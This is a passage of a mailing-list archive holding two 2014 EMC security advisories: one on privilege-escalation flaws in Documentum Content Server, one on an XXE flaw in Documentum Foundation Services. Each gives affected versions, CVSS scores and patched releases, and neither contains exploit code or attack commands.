Severity Rating: CVSS v2 Base Score: Refer below for scores for each CVE. 

Affected products:  
•   All EMC Documentum Content Server versions of 7.1
•   All EMC Documentum Content Server versions of 7.0
•   All EMC Documentum Content Server versions of 6.7 SP2
•   All EMC Documentum Content Server versions of 6.7 SP1
•   All EMC Documentum Content Server versions prior to 6.7 SP1

Summary:  
EMC Documentum Content Server contains fixes for privilege escalation 
vulnerabilities that could be potentially exploited by malicious users to 
compromise the affected system. 

Details: 
EMC Documentum Content Server may be susceptible to the following privilege 
escalation vulnerabilities:

•   CVE-2014-2513
Authenticated non-privileged users are allowed to execute arbitrary code with 
super user privileges via custom scripts. This is due to improper authorization 
checks being performed on the objects created. This could be potentially 
exploited to perform unauthorized actions on Content Server.
o   CVSS v2 Base Score: 8.2 (AV:N/AC:M/Au:S/C:C/I:C/A:P)

•   CVE-2014-2514
Authenticated non-privileged users are allowed to run save RPC commands with 
super user privileges on arbitrary objects.  This is due to improper user 
authorization checks and object type checks being performed on these objects. 
This could be potentially exploited by a malicious authenticated non-privileged 
user to perform unauthorized actions on Content Server including executing 
arbitrary code.
o   CVSS v2 Base Score: 8.2 (AV:N/AC:M/Au:S/C:C/I:C/A:P)

Resolution: 
EMC recommends all customers upgrade to one of the versions listed below at the 
earliest opportunity. 
•   EMC Documentum Content Server version 7.1 P06 and later
•   EMC Documentum Content Server version 7.0 P15 and later
•   EMC Documentum Content Server version 6.7 SP2 P15 and later
•   EMC Documentum Content Server version 6.7 SP1 P28 and later

Link to remedies:
Registered EMC Online Support customers can download patches and software from 
support.emc.com at: https://support.emc.com/downloads/2732_Documentum-Server



Read and use the information in this EMC Security Advisory to assist in 
avoiding any situation that might arise from the problems described herein. If 
you have any questions regarding this product alert, contact EMC Software 
Technical Support at 1-877-534-2867.

For an explanation of Severity Ratings, refer to EMC Knowledgebase solution 
emc218831. EMC recommends all customers take into account both the base score 
and any relevant temporal and environmental scores which may impact the 
potential severity associated with particular security vulnerability.

EMC Corporation distributes EMC Security Advisories, in order to bring to the 
attention of users of the affected EMC products, important security 
information. EMC recommends that all users determine the applicability of this 
information to their individual situations and take appropriate action. The 
information set forth herein is provided as is without warranty of any kind. 
EMC disclaims all warranties, either express or implied, including the 
warranties of merchantability, fitness for a particular purpose, title and 
non-infringement. In no event, shall EMC or its suppliers, be liable for any 
damages whatsoever including direct, indirect, incidental, consequential, loss 
of business profits or special damages, even if EMC or its suppliers have been 
advised of the possibility of such damages. Some states do not allow the 
exclusion or limitation of liability for consequential or incidental damages, 
so the foregoing limitation may not apply.

Product Security Response Center
security_al...@emc.com


-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.13 (Cygwin)

iEYEARECAAYFAlO64voACgkQtjd2rKp+ALyPuACgxtfoIFxBqHeyFVi0eNwQA428
NaEAoKzmD8WcINVBGj/CYul8UON+Osyr
=wzFw
-END PGP SIGNATURE-


ESA-2014-057: EMC Documentum Foundation Services (DFS) XML External Entity (XXE) Vulnerability

2014-07-07 Thread Security Alert

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

ESA-2014-057: EMC Documentum Foundation Services (DFS) XML External Entity 
(XXE) Vulnerability

EMC Identifier: ESA-2014-057

CVE Identifier: CVE-2014-2510

Severity Rating: CVSS v2 Base Score: 8 (AV:N/AC:L/Au:S/C:C/I:P/A:P)

Affected products:  
•   EMC DFS 6.6 all service packs and patch versions prior to P39 
•   EMC DFS 6.7 SP1 all patch versions prior to P28
•   EMC DFS 6.7 SP2 all patch versions prior to P15
•   EMC My Documentum for Desktop  6.7.2
•   EMC My Documentum for Microsoft Outlook  6.7SP1, 6.7SP2, 6.7.3  6.7.1 
•   EMC CenterStage 1.2SP1 and  1.2SP2

Summary:  
EMC DFS may be vulnerable to XML External Entity (XXE) vulnerability which can 
be potentially leveraged by a malicious authenticated user to compromise the 
affected system. 

Details: 
EMC DFS may be vulnerable to XXE vulnerability due to the way the JAXB XML 
parser handles the incoming XML from an authenticated user.  This can be 
potentially leveraged by a malicious authenticated user to inject malicious 
data in the XML and retrieve information from sensitive files on the system. 
This may also be potentially leveraged to affect the Integrity and Availability 
of the system.  

Resolution:  
The following products contain the resolution to this issue:
•   EMC DFS 6.6 P39 and later
•   EMC DFS 6.7 SP1 P28 and later
•   EMC DFS 6.7 SP2 P15 and later 
•   EMC My Documentum for Desktop 6.7.2P15 and later
•   EMC My Documentum for Microsoft Outlook 6.7SP1P28, 6.7SP2P15, 6.7.1P29, 
6.7.3 (Hotfix)
•   EMC CenterStage 1.2SP2P06 , 1.2SP1 (HotFix)

EMC recommends all customers upgrade to the fixed versions listed above at the 
earliest opportunity.

Link to remedies:
Customers can download using the links below for respective products:

EMC DFS 6.6:
https://emc.subscribenet.com/control/dctm/download?element=2808763

EMC DFS 6.7 SP2:
https://emc.subscribenet.com/control/dctm/download?element=4544131

EMC DFS 6.7 SP1
https://emc.subscribenet.com/control/dctm/download?element=3812321

My Documentum for Microsoft Desktop 6.7.2: 
https://emc.subscribenet.com/control/dctm/download?element=4300661

My Documentum for Microsoft Outlook 6.7SP1: 
https://emc.subscribenet.com/control/dctm/download?element=3832891

My Documentum for Microsoft Outlook 6.7SP2: 
https://emc.subscribenet.com/control/dctm/download?element=4544671

My Documentum for Microsoft Outlook 6.7.1: 
https://emc.subscribenet.com/control/dctm/download?element=4194721

My Documentum for Microsoft Outlook 6.7.3: (hot fix)
For the My Documentum for Microsoft Outlook 6.7.3  hot fix contact EMC Support

CenterStage 1.2SP1  (hot fix)
https://emc.subscribenet.com/control/dctm/download?element=3686131


CenterStage 1.2SP2 :
https://emc.subscribenet.com/control/dctm/download?cert_num=90816713element=4880201


Credits:  EMC would like to thank Lukasz Plonka for reporting this issue.



Read and use the information in this EMC Security Advisory to assist in 
avoiding any situation that might arise from the problems described herein. If 
you have any questions regarding this product alert, contact EMC Software 
Technical Support at 1-877-534-2867.

For an explanation of Severity Ratings, refer to EMC Knowledgebase solution 
emc218831. EMC recommends all customers take into account both the base score 
and any relevant temporal and environmental scores which may impact the 
potential severity associated with particular security vulnerability.

EMC Corporation distributes EMC Security Advisories, in order to bring to the 
attention of users of the affected EMC products, important security 
information. EMC recommends that all users determine the applicability of this 
information to their individual situations and take appropriate action. The 
information set forth herein is provided as is without warranty of any kind. 
EMC disclaims all warranties, either express or implied, including the 
warranties of merchantability, fitness for a particular purpose, title and 
non-infringement. In no event, shall EMC or its suppliers, be liable for any 
damages whatsoever including direct, indirect, incidental, consequential, loss 
of business profits or special damages, even if EMC or its suppliers have been 
advised of the possibility of such damages. Some states do not allow the 
exclusion or limitation of liability for consequential or incidental damages, 
so the foregoing limitation may not apply.


Product Security Response Center
security_al...@emc.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.13 (Cygwin)

iEYEARECAAYFAlO64swACgkQtjd2rKp+ALyvvQCcCEZV0CM/NzXz61M+34IX+PzQ
JdMAn3Plqm5HPvFz7CfgPDX4iOo8xj0U
=ED+0
-END PGP SIGNATURE-